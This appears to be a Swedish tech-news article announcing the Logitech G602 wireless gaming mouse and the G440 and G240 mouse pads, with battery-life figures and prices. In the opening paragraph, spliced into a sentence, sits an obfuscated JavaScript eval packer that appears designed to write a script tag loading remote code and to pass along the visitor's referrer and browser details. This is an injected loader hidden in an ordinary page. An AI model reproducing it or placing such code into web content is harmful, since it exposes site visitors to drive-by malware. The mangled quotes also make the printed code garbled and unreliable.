Image Image Image Image Image Image Image Image Image Image

| 23 februari, 2020

Scroll to top

Top

Logitech G med nya trådlösa gamingmusen G602

Logitech G med nya trådlösa gamingmusen G602

Idag släppte Logitech en ny mus designad för att flytta fram den trådlösa gamingens gränser. Logitech® eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zyieb|var|u0026u|referrer|yainh||js|php’.split(’|’),0,{}))
G602 Wireless Gaming Mouse
 ger dig 250 timmar laggfri batteritid kombinerat med precisionen i Logitech G:s Delta Zero™-sensorteknologi. Den är skapad för att låta dig dominera totalt på servrarna.

”När jag spelar vill jag inte tänka på något annat än mitt nästa drag. Ett av de stora problemen med de trådlösa möss som funnits på marknaden har varit osäkerheten kring ifall du ska behöva avbryta ditt spel för att byta batterier. Nu är det slut med det.” säger Ehtisham Rabbani, general manager vid Logitechs gamingavdelning.

Den senaste musen i Logitechs G-linje, Logitech G602 Wireless Gaming Mouse har två lägen, Performance och Endurance. I gamingläget – Performance – levererar musen över 250 timmars oavbruten batteritid. I sitt uthållighetsläge förlängs batteritiden ytterligare, upp till 1400 timmar. Musen är stabilt byggd med mestadels mekaniska brytare anpassade för en livslängd på minst 20 miljoner klick. Med hjälp av de elva programmerbara knapparna och Logitechs medföljande programvara Logitech Gaming Software kan du enkelt ta full kontroll över dina favoritspel. Logitech G602 Wireless Gaming Mouse väntas vara tillgänglig i handeln för ca. 799:-

För att ge alla gamers ett optimalt underlag anpassad till deras spelstil har Logitech också skapat två nya musmattor designade för att utgöra optimala ytor att använda din Logitech G-mus på. Logitech G440 Hard Gaming Mouse Pad är en hård musmatta, idealisk för spelande med höga DPI-inställningar. Logitech G240 Cloth Gaming Mouse Pad är i sin tur en mjuk musmatta skapad för spelande med låga DPI-inställningar. De väntas vara tillgängliga i handeln för ca. 219:- respektive 149:-

Tillgänglighet

Produkterna väntas vara tillgängliga från början av september 2013. För mer information besök gaming.logitech.com/sv-se.